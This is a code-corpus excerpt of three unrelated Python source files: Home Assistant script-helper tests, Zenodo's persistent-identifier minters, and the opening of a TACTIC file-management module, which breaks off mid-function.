await script_obj.async_run()
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 2
@pytest.mark.parametrize(
"continue_on_timeout,n_events", [(False, 0), (True, 1), (None, 1)]
)
async def test_wait_template_timeout(hass, mock_timeout, continue_on_timeout, n_events):
"""Test the wait template, halt on timeout."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = [
{"wait_template": "{{ states.switch.test.state == 'off' }}", "timeout": 5},
{"event": event},
]
if continue_on_timeout is not None:
sequence[0]["continue_on_timeout"] = continue_on_timeout
sequence = cv.SCRIPT_SCHEMA(sequence)
script_obj = script.Script(hass, sequence)
wait_started_flag = async_watch_for_action(script_obj, "wait")
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 0
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=5))
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == n_events
async def test_wait_template_variables(hass):
"""Test the wait template with variables."""
sequence = cv.SCRIPT_SCHEMA({"wait_template": "{{ is_state(data, 'off') }}"})
script_obj = script.Script(hass, sequence)
wait_started_flag = async_watch_for_action(script_obj, "wait")
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run({"data": "switch.test"}))
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
hass.states.async_set("switch.test", "off")
await hass.async_block_till_done()
assert not script_obj.is_running
async def test_condition_basic(hass):
"""Test if we can use conditions in a script."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event},
{
"condition": "template",
"value_template": "{{ states.test.entity.state == 'hello' }}",
},
{"event": event},
]
)
script_obj = script.Script(hass, sequence)
hass.states.async_set("test.entity", "hello")
await script_obj.async_run()
await hass.async_block_till_done()
assert len(events) == 2
hass.states.async_set("test.entity", "goodbye")
await script_obj.async_run()
await hass.async_block_till_done()
assert len(events) == 3
@patch("homeassistant.helpers.script.condition.async_from_config")
async def test_condition_created_once(async_from_config, hass):
"""Test that the conditions do not get created multiple times."""
sequence = cv.SCRIPT_SCHEMA(
{
"condition": "template",
"value_template": '{{ states.test.entity.state == "hello" }}',
}
)
script_obj = script.Script(hass, sequence, script_mode="parallel", max_runs=2)
async_from_config.reset_mock()
hass.states.async_set("test.entity", "hello")
await script_obj.async_run()
await script_obj.async_run()
await hass.async_block_till_done()
async_from_config.assert_called_once()
assert len(script_obj._config_cache) == 1
async def test_condition_all_cached(hass):
"""Test that multiple conditions get cached."""
sequence = cv.SCRIPT_SCHEMA(
[
{
"condition": "template",
"value_template": '{{ states.test.entity.state == "hello" }}',
},
{
"condition": "template",
"value_template": '{{ states.test.entity.state != "hello" }}',
},
]
)
script_obj = script.Script(hass, sequence)
hass.states.async_set("test.entity", "hello")
await script_obj.async_run()
await hass.async_block_till_done()
assert len(script_obj._config_cache) == 2
async def test_repeat_count(hass):
"""Test repeat action w/ count option."""
event = "test_event"
events = async_capture_events(hass, event)
count = 3
sequence = cv.SCRIPT_SCHEMA(
{
"repeat": {
"count": count,
"sequence": {
"event": event,
"event_data_template": {
"first": "{{ repeat.first }}",
"index": "{{ repeat.index }}",
"last": "{{ repeat.last }}",
},
},
}
}
)
script_obj = script.Script(hass, sequence)
await script_obj.async_run()
await hass.async_block_till_done()
assert len(events) == count
for index, event in enumerate(events):
assert event.data.get("first") == str(index == 0)
assert event.data.get("index") == str(index + 1)
assert event.data.get("last") == str(index == count - 1)
@pytest.mark.parametrize("condition", ["while", "until"])
async def test_repeat_conditional(hass, condition):
"""Test repeat action w/ while option."""
event = "test_event"
events = async_capture_events(hass, event)
count = 3
sequence = {
"repeat": {
"sequence": [
{
"event": event,
"event_data_template": {
"first": "{{ repeat.first }}",
"index": "{{ repeat.index }}",
},
},
{"wait_template": "{{ is_state('sensor.test', 'next') }}"},
{"wait_template": "{{ not is_state('sensor.test', 'next') }}"},
],
}
}
if condition == "while":
sequence["repeat"]["while"] = {
"condition": "template",
"value_template": "{{ not is_state('sensor.test', 'done') }}",
}
else:
sequence["repeat"]["until"] = {
"condition": "template",
"value_template": "{{ is_state('sensor.test', 'done') }}",
}
script_obj = script.Script(hass, cv.SCRIPT_SCHEMA(sequence))
wait_started = async_watch_for_action(script_obj, "wait")
hass.states.async_set("sensor.test", "1")
hass.async_create_task(script_obj.async_run())
try:
for index in range(2, count + 1):
await asyncio.wait_for(wait_started.wait(), 1)
wait_started.clear()
hass.states.async_set("sensor.test", "next")
await asyncio.wait_for(wait_started.wait(), 1)
wait_started.clear()
hass.states.async_set("sensor.test", index)
await asyncio.wait_for(wait_started.wait(), 1)
hass.states.async_set("sensor.test", "next")
await asyncio.wait_for(wait_started.wait(), 1)
wait_started.clear()
hass.states.async_set("sensor.test", "done")
await asyncio.wait_for(hass.async_block_till_done(), 1)
except asyncio.TimeoutError:
await script_obj.async_stop()
raise
assert len(events) == count
for index, event in enumerate(events):
assert event.data.get("first") == str(index == 0)
assert event.data.get("index") == str(index + 1)
@pytest.mark.parametrize("condition", ["while", "until"])
async def test_repeat_var_in_condition(hass, condition):
"""Test repeat action w/ while option."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = {"repeat": {"sequence": {"event": event}}}
if condition == "while":
sequence["repeat"]["while"] = {
"condition": "template",
"value_template": "{{ repeat.index <= 2 }}",
}
else:
sequence["repeat"]["until"] = {
"condition": "template",
"value_template": "{{ repeat.index == 2 }}",
}
script_obj = script.Script(hass, cv.SCRIPT_SCHEMA(sequence))
with mock.patch(
"homeassistant.helpers.condition._LOGGER.error",
side_effect=AssertionError("Template Error"),
):
await script_obj.async_run()
assert len(events) == 2
async def test_repeat_nested(hass):
"""Test nested repeats."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{
"event": event,
"event_data_template": {
"repeat": "{{ None if repeat is not defined else repeat }}"
},
},
{
"repeat": {
"count": 2,
"sequence": [
{
"event": event,
"event_data_template": {
"first": "{{ repeat.first }}",
"index": "{{ repeat.index }}",
"last": "{{ repeat.last }}",
},
},
{
"repeat": {
"count": 2,
"sequence": {
"event": event,
"event_data_template": {
"first": "{{ repeat.first }}",
"index": "{{ repeat.index }}",
"last": "{{ repeat.last }}",
},
},
}
},
{
"event": event,
"event_data_template": {
"first": "{{ repeat.first }}",
"index": "{{ repeat.index }}",
"last": "{{ repeat.last }}",
},
},
],
}
},
{
"event": event,
"event_data_template": {
"repeat": "{{ None if repeat is not defined else repeat }}"
},
},
]
)
script_obj = script.Script(hass, sequence, "test script")
with mock.patch(
"homeassistant.helpers.condition._LOGGER.error",
side_effect=AssertionError("Template Error"),
):
await script_obj.async_run()
assert len(events) == 10
assert events[0].data == {"repeat": "None"}
assert events[-1].data == {"repeat": "None"}
for index, result in enumerate(
(
("True", "1", "False"),
("True", "1", "False"),
("False", "2", "True"),
("True", "1", "False"),
("False", "2", "True"),
("True", "1", "False"),
("False", "2", "True"),
("False", "2", "True"),
),
1,
):
assert events[index].data == {
"first": result[0],
"index": result[1],
"last": result[2],
}
@pytest.mark.parametrize("var,result", [(1, "first"), (2, "second"), (3, "default")])
async def test_choose(hass, var, result):
"""Test choose action."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
{
"choose": [
{
"conditions": {
"condition": "template",
"value_template": "{{ var == 1 }}",
},
"sequence": {"event": event, "event_data": {"choice": "first"}},
},
{
"conditions": {
"condition": "template",
"value_template": "{{ var == 2 }}",
},
"sequence": {"event": event, "event_data": {"choice": "second"}},
},
],
"default": {"event": event, "event_data": {"choice": "default"}},
}
)
script_obj = script.Script(hass, sequence)
await script_obj.async_run({"var": var})
await hass.async_block_till_done()
assert len(events) == 1
assert events[0].data["choice"] == result
@pytest.mark.parametrize(
"action",
[
{"repeat": {"count": 1, "sequence": {"event": "abc"}}},
{"choose": {"conditions": [], "sequence": {"event": "abc"}}},
{"choose": [], "default": {"event": "abc"}},
],
)
async def test_multiple_runs_repeat_choose(hass, caplog, action):
"""Test parallel runs with repeat & choose actions & max_runs > default."""
max_runs = script.DEFAULT_MAX + 1
script_obj = script.Script(
hass, cv.SCRIPT_SCHEMA(action), script_mode="parallel", max_runs=max_runs
)
events = async_capture_events(hass, "abc")
for _ in range(max_runs):
hass.async_create_task(script_obj.async_run())
await hass.async_block_till_done()
assert "WARNING" not in caplog.text
assert "ERROR" not in caplog.text
assert len(events) == max_runs
async def test_last_triggered(hass):
"""Test the last_triggered."""
event = "test_event"
sequence = cv.SCRIPT_SCHEMA({"event": event})
script_obj = script.Script(hass, sequence)
assert script_obj.last_triggered is None
time = dt_util.utcnow()
with mock.patch("homeassistant.helpers.script.utcnow", return_value=time):
await script_obj.async_run()
await hass.async_block_till_done()
assert script_obj.last_triggered == time
async def test_propagate_error_service_not_found(hass):
"""Test that a script aborts when a service is not found."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA([{"service": "test.script"}, {"event": event}])
script_obj = script.Script(hass, sequence)
with pytest.raises(exceptions.ServiceNotFound):
await script_obj.async_run()
assert len(events) == 0
assert not script_obj.is_running
async def test_propagate_error_invalid_service_data(hass):
"""Test that a script aborts when we send invalid service data."""
event = "test_event"
events = async_capture_events(hass, event)
calls = async_mock_service(hass, "test", "script", vol.Schema({"text": str}))
sequence = cv.SCRIPT_SCHEMA(
[{"service": "test.script", "data": {"text": 1}}, {"event": event}]
)
script_obj = script.Script(hass, sequence)
with pytest.raises(vol.Invalid):
await script_obj.async_run()
assert len(events) == 0
assert len(calls) == 0
assert not script_obj.is_running
async def test_propagate_error_service_exception(hass):
"""Test that a script aborts when a service throws an exception."""
event = "test_event"
events = async_capture_events(hass, event)
@callback
def record_call(service):
"""Add recorded event to set."""
raise ValueError("BROKEN")
hass.services.async_register("test", "script", record_call)
sequence = cv.SCRIPT_SCHEMA([{"service": "test.script"}, {"event": event}])
script_obj = script.Script(hass, sequence)
with pytest.raises(ValueError):
await script_obj.async_run()
assert len(events) == 0
assert not script_obj.is_running
async def test_referenced_entities(hass):
"""Test referenced entities."""
script_obj = script.Script(
hass,
cv.SCRIPT_SCHEMA(
[
{
"service": "test.script",
"data": {"entity_id": "light.service_not_list"},
},
{
"service": "test.script",
"data": {"entity_id": ["light.service_list"]},
},
{
"condition": "state",
"entity_id": "sensor.condition",
"state": "100",
},
{"service": "test.script", "data": {"without": "entity_id"}},
{"scene": "scene.hello"},
{"event": "test_event"},
{"delay": "{{ delay_period }}"},
]
),
)
assert script_obj.referenced_entities == {
"light.service_not_list",
"light.service_list",
"sensor.condition",
"scene.hello",
}
# Test we cache results.
assert script_obj.referenced_entities is script_obj.referenced_entities
async def test_referenced_devices(hass):
"""Test referenced entities."""
script_obj = script.Script(
hass,
cv.SCRIPT_SCHEMA(
[
{"domain": "light", "device_id": "script-dev-id"},
{
"condition": "device",
"device_id": "condition-dev-id",
"domain": "switch",
},
]
),
)
assert script_obj.referenced_devices == {"script-dev-id", "condition-dev-id"}
# Test we cache results.
assert script_obj.referenced_devices is script_obj.referenced_devices
@contextmanager
def does_not_raise():
"""Indicate no exception is expected."""
yield
async def test_script_mode_single(hass, caplog):
"""Test overlapping runs with max_runs = 1."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event, "event_data": {"value": 1}},
{"wait_template": "{{ states.switch.test.state == 'off' }}"},
{"event": event, "event_data": {"value": 2}},
]
)
script_obj = script.Script(hass, sequence)
wait_started_flag = async_watch_for_action(script_obj, "wait")
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 1
assert events[0].data["value"] == 1
# Start second run of script while first run is suspended in wait_template.
await script_obj.async_run()
assert "Already running" in caplog.text
assert script_obj.is_running
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
hass.states.async_set("switch.test", "off")
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 2
assert events[1].data["value"] == 2
@pytest.mark.parametrize(
"script_mode,messages,last_events",
[("restart", ["Restarting"], [2]), ("parallel", [], [2, 2])],
)
async def test_script_mode_2(hass, caplog, script_mode, messages, last_events):
"""Test overlapping runs with max_runs > 1."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event, "event_data": {"value": 1}},
{"wait_template": "{{ states.switch.test.state == 'off' }}"},
{"event": event, "event_data": {"value": 2}},
]
)
logger = logging.getLogger("TEST")
max_runs = 1 if script_mode == "restart" else 2
script_obj = script.Script(
hass, sequence, script_mode=script_mode, max_runs=max_runs, logger=logger
)
wait_started_flag = async_watch_for_action(script_obj, "wait")
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 1
assert events[0].data["value"] == 1
# Start second run of script while first run is suspended in wait_template.
wait_started_flag.clear()
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 2
assert events[1].data["value"] == 1
assert all(
any(
rec.levelname == "INFO"
and rec.name == "TEST"
and message in rec.message
for rec in caplog.records
)
for message in messages
)
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
hass.states.async_set("switch.test", "off")
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 2 + len(last_events)
for idx, value in enumerate(last_events, start=2):
assert events[idx].data["value"] == value
async def test_script_mode_queued(hass):
"""Test overlapping runs with script_mode = 'queued' & max_runs > 1."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event, "event_data": {"value": 1}},
{"wait_template": "{{ states.switch.test.state == 'off' }}"},
{"event": event, "event_data": {"value": 2}},
{"wait_template": "{{ states.switch.test.state == 'on' }}"},
]
)
logger = logging.getLogger("TEST")
script_obj = script.Script(
hass, sequence, script_mode="queued", max_runs=2, logger=logger
)
wait_started_flag = async_watch_for_action(script_obj, "wait")
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 1
assert events[0].data["value"] == 1
# Start second run of script while first run is suspended in wait_template.
# This second run should not start until the first run has finished.
hass.async_create_task(script_obj.async_run())
await asyncio.sleep(0)
assert script_obj.is_running
assert len(events) == 1
wait_started_flag.clear()
hass.states.async_set("switch.test", "off")
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 2
assert events[1].data["value"] == 2
wait_started_flag.clear()
hass.states.async_set("switch.test", "on")
await asyncio.wait_for(wait_started_flag.wait(), 1)
await asyncio.sleep(0)
assert script_obj.is_running
assert len(events) == 3
assert events[2].data["value"] == 1
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
hass.states.async_set("switch.test", "off")
await asyncio.sleep(0)
hass.states.async_set("switch.test", "on")
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 4
assert events[3].data["value"] == 2
async def test_script_logging(hass, caplog):
"""Test script logging."""
script_obj = script.Script(hass, [], "Script with % Name")
script_obj._log("Test message with name %s", 1)
assert "Script with % Name: Test message with name 1" in caplog.text
script_obj = script.Script(hass, [])
script_obj._log("Test message without name %s", 2)
assert "Test message without name 2" in caplog.text
async def test_shutdown_at(hass, caplog):
"""Test stopping scripts at shutdown."""
delay_alias = "delay step"
sequence = cv.SCRIPT_SCHEMA({"delay": {"seconds": 120}, "alias": delay_alias})
script_obj = script.Script(hass, sequence, "test script")
delay_started_flag = async_watch_for_action(script_obj, delay_alias)
try:
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
assert script_obj.is_running
assert script_obj.last_action == delay_alias
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
hass.bus.async_fire("homeassistant_stop")
await hass.async_block_till_done()
assert not script_obj.is_running
assert "Stopping scripts running at shutdown: test script" in caplog.text
async def test_shutdown_after(hass, caplog):
"""Test stopping scripts at shutdown."""
delay_alias = "delay step"
sequence = cv.SCRIPT_SCHEMA({"delay": {"seconds": 120}, "alias": delay_alias})
script_obj = script.Script(hass, sequence, "test script")
delay_started_flag = async_watch_for_action(script_obj, delay_alias)
hass.state = CoreState.stopping
hass.bus.async_fire("homeassistant_stop")
await hass.async_block_till_done()
try:
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
assert script_obj.is_running
assert script_obj.last_action == delay_alias
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=60))
await hass.async_block_till_done()
assert not script_obj.is_running
assert (
"Stopping scripts running too long after shutdown: test script"
in caplog.text
)
async def test_update_logger(hass, caplog):
"""Test updating logger."""
sequence = cv.SCRIPT_SCHEMA({"event": "test_event"})
script_obj = script.Script(hass, sequence)
await script_obj.async_run()
await hass.async_block_till_done()
assert script.__name__ in caplog.text
log_name = "testing.123"
script_obj.update_logger(logging.getLogger(log_name))
await script_obj.async_run()
await hass.async_block_till_done()
assert log_name in caplog.text
| pschmitt/home-assistant | tests/helpers/test_script.py | Python | apache-2.0 | 46,540 | 0.000645 |
# -*- coding: utf-8 -*-
#
# This file is part of Zenodo.
# Copyright (C) 2016 CERN.
#
# Zenodo is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Zenodo is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Zenodo; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Persistent identifier minters."""
from __future__ import absolute_import
from invenio_pidstore.models import PersistentIdentifier, PIDStatus, \
RecordIdentifier
def zenodo_concept_recid_minter(record_uuid=None, data=None):
"""Mint the Concept RECID.
Reserves the Concept RECID for the record.
"""
parent_id = RecordIdentifier.next()
conceptrecid = PersistentIdentifier.create(
pid_type='recid',
pid_value=str(parent_id),
status=PIDStatus.RESERVED,
)
data['conceptrecid'] = conceptrecid.pid_value
return conceptrecid
def zenodo_deposit_minter(record_uuid, data):
"""Mint the DEPID, and reserve the Concept RECID and RECID PIDs."""
if 'conceptrecid' not in data:
zenodo_concept_recid_minter(data=data)
recid = zenodo_reserved_record_minter(data=data)
# Create depid with same pid_value of the recid
depid = PersistentIdentifier.create(
'depid',
str(recid.pid_value),
object_type='rec',
object_uuid=record_uuid,
status=PIDStatus.REGISTERED,
)
data.update({
'_deposit': {
'id': depid.pid_value,
'status': 'draft',
},
})
return depid
def zenodo_reserved_record_minter(record_uuid=None, data=None):
"""Reserve a recid."""
id_ = RecordIdentifier.next()
recid = PersistentIdentifier.create(
'recid', id_, status=PIDStatus.RESERVED
)
data['recid'] = recid.pid_value
return recid
| jainaman224/zenodo | zenodo/modules/deposit/minters.py | Python | gpl-2.0 | 2,471 | 0 |
###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ["FileException", "File", "FileAccess", "IconCreator", "FileGroup", "FileRange"]
from pyasm.common import Common, Xml, TacticException, Environment, System, Config
from pyasm.search import *
from project import Project
from subprocess import Popen, PIPE
import sys, os, string, re, stat, glob
try:
#import Image
from PIL import Image
# Test to see if imaging actually works
import _imaging
HAS_PIL = True
except:
HAS_PIL = False
try:
import Image
# Test to see if imaging actually works
import _imaging
HAS_PIL = True
except:
HAS_PIL = False
# check if imagemagick is installed, and find exe if possible
convert_exe = ''
HAS_IMAGE_MAGICK = False
if os.name == "nt":
# prefer direct exe to not confuse with other convert.exe present on nt systems
convert_exe_list = glob.glob('C:\\Program Files\\ImageMagick*')
for exe in convert_exe_list:
try:
convert_process = Popen(['%s\\convert.exe'%exe,'-version'], stdout=PIPE, stderr=PIPE)
convert_return,convert_err = convert_process.communicate()
if 'ImageMagick' in convert_return:
convert_exe = '%s\\convert.exe'%exe
HAS_IMAGE_MAGICK = True
except:
print "Running %s failed" %exe
if not convert_exe_list:
# IM might not be in Program Files but may still be in PATH
try:
convert_process = Popen(['convert','-version'], stdout=PIPE, stderr=PIPE)
convert_return,convert_err = convert_process.communicate()
if 'ImageMagick' in convert_return:
convert_exe = 'convert'
HAS_IMAGE_MAGICK = True
except:
pass
else:
# in other systems (e.g. unix) 'convert' is expected to be in PATH
try:
convert_process = Popen(['convert','-version'], stdout=PIPE, stderr=PIPE)
convert_return,convert_err = convert_process.communicate()
if 'ImageMagick' in convert_return:
convert_exe = 'convert'
HAS_IMAGE_MAGICK = True
except:
pass
if Common.which("ffprobe"):
HAS_FFMPEG = True
else:
HAS_FFMPEG = False
import subprocess
class FileException(TacticException):
pass
class File(SObject):
NORMAL_EXT = ['max','ma','xls' ,'xlsx', 'doc', 'docx','txt', 'rtf', 'odt','fla','psd', 'xsi', 'scn', 'hip', 'xml','eani','pdf', 'fbx',
'gz', 'zip', 'rar',
'ini', 'db', 'py', 'pyd', 'spt'
]
VIDEO_EXT = ['mov','wmv','mpg','mpeg','m1v','m2v','mp2','mp4','mpa','mpe','mp4','wma','asf','asx','avi','wax',
'wm','wvx','ogg','webm','mkv','m4v','mxf','f4v','rmvb']
IMAGE_EXT = ['jpg','png','tif','tiff','gif','dds','dcm']
SEARCH_TYPE = "sthpw/file"
BASE_TYPE_SEQ = "sequence"
BASE_TYPE_DIR = "directory"
BASE_TYPE_FILE = "file"
def get_code(my):
return my.get_value("code")
def get_file_name(my):
return my.get_value("file_name")
def get_file_range(my):
return my.get_value("file_range")
def get_type(my):
return my.get_value("type")
def get_media_type_by_path(cls, path):
tmp, ext = os.path.splitext(path)
ext = ext.lstrip(".")
ext = ext.lower()
if ext in File.VIDEO_EXT:
return "video"
elif ext in File.NORMAL_EXT:
return "document"
else:
return "image"
get_media_type_by_path = classmethod(get_media_type_by_path)
def get_sobject(my):
'''get the sobject associated with this file'''
search = Search(my.get_value("search_type"))
search.add_id_filter(my.get_value("search_id"))
sobject = search.get_sobject()
return sobject
def get_full_file_name(my):
'''Gets the full file name. This is the same as get_file_name'''
return my.get_file_name()
def get_lib_dir(my,snapshot=None):
'''go through the stored snapshot_code to get the actual path'''
code = my.get_value("snapshot_code")
from snapshot import Snapshot
snapshot = Snapshot.get_by_code(code)
return snapshot.get_lib_dir()
def get_env_dir(my,snapshot=None):
'''go through the stored snapshot_code to get the actual path'''
code = my.get_value("snapshot_code")
from snapshot import Snapshot
snapshot = Snapshot.get_by_code(code)
return snapshot.get_env_dir()
def get_web_dir(my,snapshot=None):
'''go through the stored snapshot_code to get the actual path'''
code = my.get_value("snapshot_code")
from snapshot import Snapshot
snapshot = Snapshot.get_by_code(code)
return snapshot.get_web_dir()
def get_lib_path(my):
filename = my.get_full_file_name()
return "%s/%s" % (my.get_lib_dir(), filename)
def get_env_path(my):
'''path beginning with $TACTIC_ASSET_DIR'''
filename = my.get_full_file_name()
return "%s/%s" % (my.get_env_dir(), filename)
def get_web_path(my):
filename = my.get_full_file_name()
return "%s/%s" % (my.get_web_dir(), filename)
##################
# Static Methods
##################
"""
# DEPRERECATED
PADDING = 10
# DEPRERECATED
def add_file_code(file_path, file_code):
ext = ".".join( File.get_extensions(file_path) )
padded_id = str(file_code).zfill(File.PADDING)
file_path = file_path.replace(".%s" % ext, "_%s.%s" % (padded_id, ext) )
return file_path
add_file_code = staticmethod(add_file_code)
# DEPRERECATED
def remove_file_code(file_path):
new_path = re.compile(r'_(\w{%s})\.' % File.PADDING).sub(".", file_path)
return new_path
remove_file_code = staticmethod(remove_file_code)
# DEPRERECATED
def extract_file_code(file_path):
p = re.compile(r'_(\w{%s})\.' % File.PADDING)
m = p.search(file_path)
if not m:
return 0
groups = m.groups()
if not groups:
return 0
else:
file_code = groups[0]
# make sure there are only alpha/numberic characters
if file_code.find("_") != -1:
return 0
# make sure the first 3 are numeric
if not re.match('^\d{3}\w+$', file_code):
return 0
# strip out the leading zeros
return file_code.lstrip("0")
extract_file_code = staticmethod(extract_file_code)
# DEPRERECATED
def extract_file_path(file_path):
'''return file path without the unique id'''
p = re.compile(r'_(\w{%s})\.' % File.PADDING)
m = p.search(file_path)
if not m:
return file_path
groups = m.groups()
if not groups:
return file_path
else:
new_path = file_path.replace("_%s" % groups[0], "")
return new_path
extract_file_path = staticmethod(extract_file_path)
# DEPRERECATED
def has_file_code(file_path):
file_code = File.extract_file_code(file_path)
if file_code == 0:
return False
else:
return True
has_file_code = staticmethod(has_file_code)
"""
def get_extension(file_path):
'''get only the final extension'''
parts = os.path.basename(file_path).split(".")
ext = parts[len(parts)-1]
return ext
get_extension = staticmethod(get_extension)
def get_extensions(file_path):
'''get all of the extensions after the first .'''
parts = os.path.basename(file_path).split(".")
ext = parts[1:len(parts)]
return ext
get_extensions = staticmethod(get_extensions)
def get_by_snapshot(cls, snapshot, file_type=None):
xml = snapshot.get_xml_value("snapshot")
file_codes = xml.get_values("snapshot/file/@file_code")
search = Search( cls.SEARCH_TYPE)
search.add_filters("code", file_codes)
if file_type:
search.add_filter("type", file_type)
return search.get_sobjects()
get_by_snapshot = classmethod(get_by_snapshot)
def get_by_filename(cls, filename, skip_id=None, padding=0):
search = Search(cls.SEARCH_TYPE)
# if this is a file range then convert file name to padding
# FIXME: need some way to know what and where the padding is
if padding:
filename = re.sub("(.*\.)(\d+)", r"\1####", filename)
search.add_filter("file_name", filename)
project_code = Project.get_project_code()
search.add_filter("project_code", project_code)
if skip_id:
search.add_where('id != %s'%skip_id)
return search.get_sobject()
get_by_filename = classmethod(get_by_filename)
def get_by_snapshots(cls, snapshots, file_type=None):
all_file_codes = []
for snapshot in snapshots:
xml = snapshot.get_xml_value("snapshot")
file_codes = xml.get_values("snapshot/file/@file_code")
all_file_codes.extend(file_codes)
search = Search( cls.SEARCH_TYPE)
search.add_filters("code", all_file_codes)
if file_type:
search.add_filter("type", file_type)
files = search.get_sobjects()
# cache these
for file in files:
key = "%s|%s" % (file.get_search_type(),file.get_code())
SObject.cache_sobject(key, file)
return files
get_by_snapshots = classmethod(get_by_snapshots)
# DEPRECATED
"""
def get_by_path(path):
file_code = File.extract_file_code(path)
if file_code == 0:
return None
search = Search(File.SEARCH_TYPE)
search.add_id_filter(file_code)
file = search.get_sobject()
return file
get_by_path = staticmethod(get_by_path)
"""
def get_by_path(path):
asset_dir = Environment.get_asset_dir()
path = path.replace("%s/" % asset_dir, "")
relative_dir = os.path.dirname(path)
file_name = os.path.basename(path)
# NOTE: this does not work with base_dir_alias
search = Search("sthpw/file")
search.add_filter("relative_dir", relative_dir)
search.add_filter("file_name", file_name)
sobject = search.get_sobject()
return sobject
get_by_path = staticmethod(get_by_path)
def create( file_path, search_type, search_id, file_type=None, requires_file=True, st_size=None, repo_type=None, search_code = None):
exists = os.path.exists(file_path)
isdir = os.path.isdir(file_path)
if requires_file and not os.path.exists(file_path):
raise FileException("File '%s' does not exist" % file_path)
file_name = os.path.basename(file_path)
file = File(File.SEARCH_TYPE)
file.set_value("file_name", file_name)
file.set_value("search_type", search_type)
if search_code:
file.set_value("search_code", search_code)
# MongoDb
if search_id and isinstance(search_id, int):
file.set_value("search_id", search_id)
if file_type:
file.set_value("type", file_type)
if isdir:
file.set_value("base_type", File.BASE_TYPE_DIR)
else:
file.set_value("base_type", File.BASE_TYPE_FILE)
project = Project.get()
file.set_value("project_code", project.get_code())
if exists:
if isdir:
dir_info = Common.get_dir_info(file_path)
size = dir_info.get("size")
file.set_value("st_size", size)
else:
from stat import ST_SIZE
size = os.stat(file_path)[ST_SIZE]
file.set_value("st_size", size)
elif st_size != None:
file.set_value("st_size", st_size)
if repo_type:
file.set_value("repo_type", repo_type)
file.commit()
return file
create = staticmethod(create)
def makedirs(dir, mode=None):
'''wrapper to mkdirs in case it ever needs to be overridden'''
print "DEPRECATED: use System().makedirs()"
return System().makedirs(dir,mode)
makedirs = staticmethod(makedirs)
def get_filesystem_name(name, strict=True):
'''takes a name and converts it to a name that can be saved in
the filesystem.'''
filename = name
filename = filename.replace("/", "__")
filename = filename.replace("|", "__")
filename = filename.replace(":", "__")
filename = filename.replace("?", "__")
filename = filename.replace("=", "__")
if strict:
filename = filename.replace(" ", "_")
filename_base, ext = os.path.splitext(filename)
ext = string.lower(ext)
filename = "%s%s" % (filename_base, ext)
return filename
get_filesystem_name = staticmethod(get_filesystem_name)
def process_file_path(file_path):
'''makes a file path completely kosher with the file system. Only do it on basename or it would remove the : from C:/'''
return Common.get_filesystem_name(file_path)
process_file_path = staticmethod(process_file_path)
def get_md5(path):
'''get md5 checksum'''
py_exec = Config.get_value("services", "python")
if not py_exec:
py_exec = "python"
if isinstance(path, unicode):
path = path.encode('utf-8')
popen = subprocess.Popen([py_exec, '%s/src/bin/get_md5.py'%Environment.get_install_dir(), path], shell=False, stdout=subprocess.PIPE)
popen.wait()
output = ''
value = popen.communicate()
